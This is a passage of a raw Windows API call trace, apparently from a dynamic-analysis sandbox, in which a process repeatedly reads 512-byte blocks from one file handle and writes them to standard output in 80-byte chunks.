SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.302] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 
[0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.303] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.303] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, 
lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.305] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.305] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 
0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.306] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.306] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) 
returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.308] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.308] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.309] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.309] ReadFile 
(in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.311] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.311] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, 
lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, 
lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.312] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.312] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, 
